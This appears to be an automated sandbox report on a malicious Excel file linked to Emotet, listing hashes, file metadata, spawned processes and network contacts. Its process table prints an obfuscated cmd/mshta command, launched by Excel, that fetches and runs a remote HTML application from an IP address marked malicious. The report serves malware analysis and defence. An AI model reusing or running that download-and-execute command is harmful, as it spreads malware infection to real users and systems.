File name: | 123.xls |
Full analysis: | https://app.any.run/tasks/4b7047e0-38b0-4231-8fa2-a8bba552d80c |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 25, 2022, 03:24:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 19 09:31:16 2022, Last Saved Time/Date: Wed Jan 19 09:34:50 2022, Security: 0 |
MD5: | B90E4CCBC4A778CE124631483793E357 |
SHA1: | B1ECF1489DBD82427F4FAE181A451117E4AA6E93 |
SHA256: | 1F01EC0B5B4994CF520472586290D49C00653DF2E80922613541046D7EE04367 |
SSDEEP: | 3072:4Rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAlhEvN8B/W6X1yxYovrepMUdQ6gSz4iq:Qk3hbdlylKsgqopeJBWhZFVE+W2NdAli |
.xls | | | Microsoft Excel sheet (78.9) |
---|
HeadingPairs: |
|
---|---|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
ModifyDate: | 2022:01:19 09:34:50 |
CreateDate: | 2022:01:19 09:31:16 |
Software: | Microsoft Excel |
LastModifiedBy: | xXx |
Author: | xXx |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2216 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1904 | cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
188 | mshta http://0xb907d607/fer/fer.html | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 11.00.9600.16428 (winblue_gdr.131013-1700) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2216 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2EFC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2216 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\123.xls.LNK | lnk | |
MD5:23E2451733D076AC6B6FE00081E8D3FB | SHA256:C3BDB56AFE95CAA2F77E8C2EB985D9D120464857CF1634A69359005EE483C20E | |||
2216 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:15774CC5128FC414C0F7B3BEEC4CBE94 | SHA256:D8CD0051B2027C7D27BBC218CB903A34469ED02C30D337AAA4CBCB5881F46E10 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
188 | mshta.exe | GET | — | 185.7.214.7:80 | http://185.7.214.7/fer/fer.html | FR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
188 | mshta.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |